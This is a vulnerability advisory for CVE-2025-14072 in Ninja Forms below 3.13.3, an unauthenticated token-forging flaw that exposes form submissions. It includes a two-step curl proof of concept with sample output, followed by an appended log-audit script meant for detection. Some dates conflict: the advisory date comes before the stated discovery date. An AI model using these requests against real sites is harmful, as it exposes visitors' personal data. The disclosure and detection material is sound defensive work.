Unauthenticated Token Generation and Submission Disclosure in Ninja Forms < 3.13.3

Name              Unauthenticated Token Forging and Data Exposure
Systems Affected  WordPress - Ninja Forms < 3.13.3
Severity          High 7.5/10
Impact            CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Vendor            https://wordpress.org/plugins/ninja-forms/
Advisory          https://www.ush.it/team/ush/hack-ninja-forms/token-ninja-forms-3.13.3.txt
Authors           Marco Lunardi
Date              20251016

I. BACKGROUND

Ninja Forms is one of the most widely used WordPress form builders, installed on hundreds of thousands of websites globally. The plugin allows administrators to create contact forms, collect submissions and manage user-provided data from within the WordPress dashboard.

II. DESCRIPTION

A critical vulnerability has been identified in Ninja Forms versions < 3.13.3 which allows unauthenticated attackers to generate valid access tokens for arbitrary form IDs. These tokens are issued via a publicly accessible REST API endpoint designed to refresh authentication tokens.

The endpoint responsible for token generation performs no user authentication, capability check or nonce validation, so any remote user can request and obtain a valid token. The issued token is then accepted by further REST API endpoints that expose form submission data.

As a result, any unauthenticated attacker can enumerate form identifiers and retrieve stored submissions, including names, email addresses and any other personal or sensitive data submitted via affected forms. This constitutes a severe Broken Access Control condition combined with sensitive information disclosure.

III. ANALYSIS

Practical confirmed impacts include:

- Complete disclosure of stored form submissions
- Exposure of personal and potentially sensitive user data
- Violation of data protection and privacy obligations
- Risk of GDPR non-compliance for EU-based website owners

Proof of Concept

1. Create a form and note the Form ID (ex: 1)

2. Submit an entry.

3. Generate a valid token without authentication:

   curl -X POST "http://example.com/?rest_route=/ninja-forms-views/token/refresh" \
        -d "formIds[]=1"

   Example output:

   {"token": "", "publicKey": "...", "expiresIn": 900, "formIds": [1]}

4. Use the token to read all submissions:

   curl "http://example.com/?rest_route=/ninja-forms-views/forms/1/submissions" \
        -H "X-NinjaFormsViews-Auth: "

   Example output:

   {"1": "Alice", "2": "alice@example.com", "3": "Test message"}

This confirms complete disclosure of all form data.

IV. WORKAROUND

Confirmed affected:

- Ninja Forms < 3.13.3

Earlier versions may also be affected but were not tested.

V. CVSS 3.1

CVSS Base Score: 7.5 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

VI. ROOT CAUSE

The REST endpoint responsible for generating access tokens does not enforce any authentication or authorization controls, allowing anonymous users to request valid tokens. These tokens are subsequently trusted by other endpoints handling submission data access.

VII. MITIGATION

Website administrators should:

- Update Ninja Forms to the latest available version
- Revoke any previously issued access tokens
- Audit access logs for suspicious submission access activity

VIII. CVE INFORMATION

CVE-2025-14072 has been officially published.

https://www.cve.org/CVERecord?id=CVE-2025-14072

IX. DISCLOSURE TIMELINE

20251116  Vulnerability discovered
20251117  Issue reported to WPScan
20251204  WPScan reviews the vulnerability
20251204  WPScan confirms the vulnerability and assigns CVE-2025-14072
20251208  Vendor releases updated Ninja Forms version 3.13.3 containing the fix

X. CREDIT

This vulnerability was discovered by Marco Lunardi with contributions by Francesco "ascii" Ongaro and Pasquale "sid" Fiorillo.

XI. LEGAL NOTICE

Copyright (c) 2026 Marco Lunardi

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consent.
If you wish to reprint the whole or any part of this alert in any medium other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
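As an added example supporting the log-audit step in the MITIGATION section (editor-supplied code, not part of the advisory and not the plugin's own code), the script below scans web server access-log lines for a client that obtained a token from the token refresh route and then read form submissions through the submissions route. It assumes the combined log format and handles both the `?rest_route=` and `/wp-json/` URL styles; the sample lines are constructed, not real traffic.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [16/Oct/2025:10:01:02 +0000] "POST /?rest_route=/ninja-forms-views/token/refresh HTTP/1.1" 200 95 "-" "curl/8.4.0"
203.0.113.7 - - [16/Oct/2025:10:01:05 +0000] "GET /?rest_route=/ninja-forms-views/forms/1/submissions HTTP/1.1" 200 412 "-" "curl/8.4.0"
203.0.113.7 - - [16/Oct/2025:10:01:06 +0000] "GET /wp-json/ninja-forms-views/forms/2/submissions HTTP/1.1" 200 388 "-" "curl/8.4.0"
198.51.100.4 - - [16/Oct/2025:10:02:10 +0000] "GET /contact/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Oct/2025:10:02:15 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 60 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TOKEN_ROUTE = "/ninja-forms-views/token/refresh"
SUBMISSIONS_RE = re.compile(r"^/ninja-forms-views/forms/(\d+)/submissions$")


def rest_route(path):
    """Return the REST route of a request URL, or None if it is not a REST call."""
    parsed = urlparse(path)
    qs = parse_qs(parsed.query)
    if "rest_route" in qs:            # plain-permalink style: /?rest_route=/...
        return qs["rest_route"][0]
    if parsed.path.startswith("/wp-json/"):   # pretty-permalink style
        return parsed.path[len("/wp-json"):]
    return None


def find_token_abuse(log_text):
    """Map client IP -> sorted form IDs for clients that minted a token, then read submissions."""
    minted = set()                    # clients that hit the token refresh route
    reads = defaultdict(set)          # form IDs read after minting, per client
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("status") != "200":
            continue
        route = rest_route(m.group("path"))
        if route is None:
            continue
        if route == TOKEN_ROUTE and m.group("method") == "POST":
            minted.add(m.group("ip"))
        sub = SUBMISSIONS_RE.match(route)
        if sub and m.group("ip") in minted:
            reads[m.group("ip")].add(int(sub.group(1)))
    return {ip: sorted(ids) for ip, ids in reads.items()}


if __name__ == "__main__":
    for ip, ids in find_token_abuse(SAMPLE_LOG).items():
        print(f"{ip} minted a token and then read submissions of forms {ids}")
```

Access logs do not record the X-NinjaFormsViews-Auth header, so correlating by client address and request order is a heuristic; on a site that ran a version below 3.13.3, any hit on the submissions route from an address that never authenticated to the dashboard deserves review on its own.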